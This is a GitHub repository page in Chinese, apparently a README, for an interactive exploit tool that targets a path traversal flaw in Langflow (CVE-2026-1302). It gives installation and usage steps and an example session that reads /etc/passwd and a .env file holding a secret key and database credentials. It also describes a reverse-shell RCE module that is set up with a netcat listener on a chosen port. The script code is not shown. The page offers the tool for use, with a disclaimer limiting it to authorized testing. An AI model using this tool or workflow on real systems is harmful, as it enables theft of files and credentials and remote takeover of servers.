ekomsSavior/Lang_path
GitHub: ekomsSavior/Lang_path
针对 Langflow 可视化 AI 平台路径遍历漏洞(CVE-2026-1302)的交互式利用工具,支持任意文件读取与 RCE 尝试。
Stars: 0 | Forks: 0
# Lang_path
Langflow 路径遍历漏洞利用工具 (CVE-2026-1302)
一个完全交互式的 Python 脚本,用于利用 Langflow 版本 ≤ 1.2.1 中的路径遍历漏洞,详见 [GHSA‑vwmf‑pq79‑vjvx](https://github.com/langflow-ai/langflow/security/advisories/GHSA-vwmf-pq79-vjvx)。
该工具允许攻击者从服务器读取任意文件,并在某些配置下实现远程代码执行。
## 免责声明
本工具仅供授权安全测试和教育目的使用。
未经授权访问计算机系统是非法的。作者不对因使用本软件而导致的任何误用或损害承担责任。
请仅针对您拥有或明确获得测试许可的系统使用本工具。
## 安装
1. **克隆仓库**
git clone https://github.com/ekomsSavior/Lang_path.git
cd Lang_path
```
1. Install the required Python package
```bash
pip3 install requests
```
2. 使脚本可执行(可选)
chmod +x langflow_exploit.py
用法
运行脚本并按照交互式提示操作:
```
python3 langflow_exploit.py
```
系统将要求您提供:
· Target URL(目标 URL):Langflow 实例的基础 URL(例如,http://192.168.1.100:7860)。
· Continue prompts(继续提示):如果版本检测失败或初始测试结果不确定,您可以选择继续执行。
· File paths(文件路径):在交互模式下,您可以指定任何要读取的文件路径(例如,/etc/passwd, /app/langflow/.env)。
· LHOST/LPORT:如果您选择尝试远程代码执行,请提供您的 IP 和用于 reverse shell 的监听端口。
示例会话
```
$ python3 langflow_exploit.py
╔═══════════════════════════════════════════════════════╗
║ Langflow Path Traversal Exploit ║
║ CVE-2026-1302 - File Read & RCE ║
║ Affects Langflow <= 1.2.1 ║
╚═══════════════════════════════════════════════════════╝
[*] Please provide the target Langflow instance:
Target URL (e.g., http://192.168.1.100:7860): http://10.10.10.50:7860
[*] Target set to: http://10.10.10.50:7860
[+] Target is reachable
[*] Detected Langflow version: 1.2.0
[+] Version appears vulnerable!
[*] Testing for path traversal vulnerability...
[+] VULNERABLE! Successfully read /etc/passwd
[*] Target is vulnerable! Entering interactive mode.
==================================================
Available actions:
1. Read another file
2. Attempt RCE (reverse shell)
3. Exit
Select action (1/2/3): 1
Enter file path to read (e.g., /etc/passwd): /app/langflow/.env
[+] Contents of /app/langflow/.env:
==================================================
SECRET_KEY=supersecretkey123
DATABASE_URL=postgresql://user:pass@localhost/langflow
...
==================================================
```
远程代码执行 (RCE) 尝试
该脚本包含一个模块,尝试上传恶意组件以获取 reverse shell。
在选择选项 2 之前,请在单独的终端中启动一个 netcat 监听器:
```
nc -lvnp 4444
```
然后按照提示提供您的 IP (LHOST) 和相同的端口 (LPORT)。
如果成功,您将在监听器终端中看到一个连接。
注意:RCE 成功与否取决于目标配置。文件读取功能是主要可靠的利用方式。
参考资料
· Langflow 安全公告 GHSA‑vwmf‑pq79‑vjvx
· CVE-2026-1302 详情
· Langflow GitHub 仓库
标签:CISA项目, CVE-2026-1302, HTTP工具, Langflow, Langflow安全, Maven, PoC, Python, RCE, 任意文件读取, 安全测试, 攻击性安全, 无后门, 暴力破解, 漏洞验证, 编程工具, 网络安全, 网络安全审计, 路径遍历, 远程代码执行, 逆向Shell, 逆向工具, 隐私保护